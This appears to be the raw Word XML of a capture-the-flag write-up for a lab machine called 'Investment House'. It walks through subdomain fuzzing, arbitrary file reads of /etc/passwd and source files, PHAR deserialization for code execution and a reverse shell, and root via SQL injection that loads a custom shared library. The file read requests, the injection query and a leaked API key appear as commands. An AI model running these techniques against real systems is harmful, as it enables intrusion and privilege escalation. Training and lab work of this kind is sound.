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c6vptql6led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7r5g5txamg9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Investment House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ovxp49fg8wlv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a port scan was performed on the machine, and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nmap -sVC --min-rate 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38788" cy="2190379"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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1903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the Nmap output, we can see that the IP is automatically redirecting to the host</w:t>
      </w:r>
      <w:hyperlink r:id="rId10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http://investmenthouse.hc/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so we need to add this URL to our local hosts file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000E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714875" cy="2219325"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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193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that in place, we can now access the web page and inspect its content.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000012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5310188" cy="3191218"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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1912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application has a login and registration page. The homepage appears to belong to an investment company under construction. We will continue reconnaissance by performing a subdomain scan.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ffuf -c -u 'http://investmenthouse.hc' -H 'Host: FUZZ.investmenthouse.hc' -w ~/Documents/SecLists/Discovery/DNS/subdomains-top1million-20000.txt -fw 20 -t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462588" cy="2144766"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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1447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discovered a vhost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but we do not have any credentials to authenticate.</w:t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038600" cy="2776538"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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776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during directory enumeration, we found directories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 of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lists files and other directories that may exist in the application.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http://secrets.investmenthouse.hc/FUZZ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~/Documents/SecLists/Discovery/Web-Content/big.txt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-fw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414963" cy="2880106"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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88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endpoint, we can find the files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list.php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rotate.php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272088" cy="1799607"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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7996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/classes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endpoint, we can find the files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453063" cy="1808949"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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8089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at the /config endpoint, we find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91150" cy="2004749"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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047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information, we can begin interacting with the application to gather more details.</w:t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/api/list.php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reveals another subdomain </w:t>
      </w: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api.investmenthouse.hc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other hand,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/api/rotate.php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generates new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tokens by sending a POST request with the body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{"rotate":true}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67338" cy="4335157"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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433515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95913" cy="2566349"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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5663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new token, we can now interact with the application on the newly discovered subdomain, at the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/api/config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endpoint.</w:t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19738" cy="2538725"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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538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initial response from the application requires the previously generated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 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781550" cy="1028700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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endpoint response provides an important hint: “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u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can use config_template parameter to customize output format with configuration files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”, this suggests that file inclusion may be possible.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186363" cy="3698608"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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69860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sending a request with a non-existent filename, we receive an error:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000048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'http://api.investmenthouse.hc/api/config?config_template=test'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'x-api-key:X-API-KEY'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867150" cy="1009650"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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096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when sending the request with a standard existing Linux system file, we receive its contents in the response, confirming the presence of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File Read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vulnerability, allowing us to read any file accessible by the web server.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'http://api.investmenthouse.hc/api/config?config_template=/etc/passwd'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'x-api-key:X-API-KEY'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630550" cy="929179"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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550" cy="9291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onward, we can begin gathering important information from the server, starting with identifying where the current application is running.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000054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'http://api.investmenthouse.hc/api/config?config_template=/proc/self/cmdline'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'x-api-key:X-API-KEY'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38788" cy="1104137"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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11041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Additionally, we need to understand the first application we encountered, running on the main host “</w:t>
      </w:r>
      <w:hyperlink r:id="rId2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investmenthouse.hc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'http://api.investmenthouse.hc/api/config?config_template=/etc/apache2/sites-available/investmenthouse.hc.conf'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424488" cy="1660380"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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66038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information, we can begin reading the source code to understand its behavior and search for vulnerabilities.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found the import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class.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000060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'http://api.investmenthouse.hc/api/config?config_template=/var/www/investmenthouse.hc/public/index.php'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686175" cy="1762125"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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762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class, we identified important information. The application uses the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filter_input()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on the ?p=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parameter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filters characters such as .., /, and \, commonly used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 Traversal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attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000066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'http://api.investmenthouse.hc/api/config?config_template=/var/www/investmenthouse.hc/app/classes/Page.php'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00688" cy="3340962"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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34096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application controllers, reading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download.php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reveals additional information. The file validates whether .. exists in the ?f= parameter and returns “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Access Denied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 if found. However, the file supports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phar://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wrapper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'http://api.investmenthouse.hc/api/config?config_template=/var/www/investmenthouse.hc/app/controllers/download.php'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00688" cy="3446745"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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4467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register.php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see the use of a class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LogManager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'http://api.investmenthouse.hc/api/config?config_template=/var/www/investmenthouse.hc/app/controllers/register.php'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40666" cy="2537063"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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66" cy="2537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LogManager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class contains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__destruct()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method, which writes content to a file. This presents a favorable scenario for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PHAR-based insecure deserialization attack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'http://api.investmenthouse.hc/api/config?config_template=/var/www/investmenthouse.hc/app/classes/LogManager.php'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'x-api-key:4GcVyXYhoVuhuR3I9ZhEczZE3al0SF7d'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'.data._config.data'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033963" cy="3195904"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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19590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 deserialization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occurs when PHP unserializes metadata from a PHAR file. This happens automatically during certain file operations on PHAR files, even without explicit unserialize() calls.</w:t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 does this work?</w:t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PHAR file consists of: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Stub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Manifest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Signature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being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Signature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optional. What does each one do?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Stub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PHP code executed when the PHAR is accessed.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Manifest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Metadata where serialized PHP objects are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OFiles included in the PHAR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how does deserialization happen?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PHP reads PHAR metadata during file operations (such as file_exists() or is_file()), it automatically unserializes serialized objects in the manifest if accessed through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pwrapper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phar://.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file does not need to have a .phar extension — it can be .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png, .jpg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etc., enabling extension filter bypass.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vulnerability exists here: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(strpos($file,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'phar://'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$file_path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(!file_exists($file_path)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!is_file($file_path))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 not found'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functions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file_exists()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is_file()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automatically trigger PHAR metadata deserialization when the path begins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phar://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cgffnvt3e1m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created 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.phar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containing a serialized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LogManager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object in its metadata to achieve RCE. </w:t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29238" cy="3219748"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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21974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generating the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.phar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using PHP, we renamed it with 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.png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extension to bypass file extension filtering.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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829175" cy="990600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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948238" cy="1009298"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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00929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uploading the file, we received the message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“Done”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confirming successful upload.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009C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167313" cy="3306357"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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30635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uploads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was also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 of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revealing the existing file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portfolio.pdf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our uploaded file with a random hash prefix.</w:t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19713" cy="2225072"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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2250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then executed the uploaded file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phar://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wrapper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?f=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parameter. Although the response body displayed “File not found”, the HTTP response code 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200 OK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605463" cy="2263744"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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226374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returning to the directory listing, we observed that a file named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had been created — written by the LogManager destructor method.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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86388" cy="2624138"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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6241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resulted in RCE, followed by a reverse shell, and finally the first flag.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AB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538788" cy="1943901"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="254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194390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948238" cy="2085555"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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0855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upgrade the shell to a full TTY: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TERM=xterm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Ctrl + z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 raw -echo ; fg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310188" cy="2782742"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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7827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80" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.na5tole0hd7g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 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privilege escalation, we enumerated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binaries and found a non-standard binary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managment-tool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243513" cy="3235180"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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23518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binary is responsible for searching, activating, and listing users in the database.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BD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038475" cy="876300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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analyzing the binary code, we found the function “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activate_user()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”,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activating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729288" cy="2561653"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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56165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function builds an SQL query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snprintf()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user input, making it vulnerable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Additionally,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sqlite3_enable_load_extension()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enabled, allowing loading of external libraries.</w:t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this, we can create our own lib to execute the bash binary with elevated permissions, since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allows us to use the "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load_extension()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function to load an external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4086225" cy="1819275"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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gcc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-shared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teste.so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-fPIC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teste.c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our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.so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created, we can now load it using a common query, however, we need to remember that the query selects 4 columns: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 we need to match this structure for our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injection to be effective.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our query looks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 UNION SELECT load_extension("/tmp/</w:t>
      </w:r>
      <w:hyperlink r:id="rId5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18"/>
            <w:szCs w:val="18"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">teste.so</w:t>
        </w:r>
      </w:hyperlink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"), NULL, NULL, NULL; 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execution, the library ran bash with root privileges due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bit on the binary, granting root access and the final flag.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D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472113" cy="1832807"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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8328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5214938" cy="2716113"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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7161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53" w:type="default"/>
      <w:headerReference r:id="rId54" w:type="first"/>
      <w:headerReference r:id="rId55" w:type="even"/>
      <w:footerReference r:id="rId56" w:type="default"/>
      <w:footerReference r:id="rId57" w:type="first"/>
      <w:footerReference r:id="rId5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rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.a57jk4lycsjr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4" name="image23.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image2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4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Investment House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4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3001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19.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6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12.png"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2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6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39.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://api.investmenthouse.hc" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://investmenthouse.hc" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://teste.so" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://investmenthouse.hc/" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://investmenthouse.hc/" TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image41.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28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4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aDZc4SQM8MCWAZSCHMpv/UTqw==">CgMxLjAyDmguYzZ2cHRxbDZsZWRyMg5oLmw3cjVnNXR4YW1nOTIOaC5vdnhwNDlmZzh3bHYyDmguY2dmZm52dDNlMW1pMg5oLm5hNXRvbGUwaGQ3ZzIOaC5hNTdqazRseWNzanI4AHIhMWVNNjRfUDRBazhYeDI3QVpXM1hVRXQzLU5ETWZSaEtk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